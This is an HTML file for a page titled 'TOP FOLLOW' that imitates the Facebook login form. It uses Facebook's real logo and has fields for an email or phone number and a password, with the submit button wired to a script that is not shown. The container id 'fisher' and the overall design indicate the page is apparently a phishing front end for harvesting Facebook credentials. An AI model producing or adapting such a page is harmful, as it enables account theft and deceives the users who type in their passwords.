<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TOP FOLLOW</title>
    
    <link rel="stylesheet" href="index.css">
</head>
<body>
  
    <div id="fisher">

        <div id="form">
            <div id="lg"><img id="imgg" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt=""></div>
            <h1>Log Into Facebook</h1>
            <input type="username" id="username" placeholder="Email or phone number" name="username"><br>
            <input type="password" id="password" placeholder="password" name="password"><br>
            <input type="submit" name="log in" onclick="fn1()" id="btn"><br>
            <a href="#">Forgot account? </a><a href="">sign up</a>
        </div>
    </div>
    
</body>
<script src="index.js"></script>
</html>
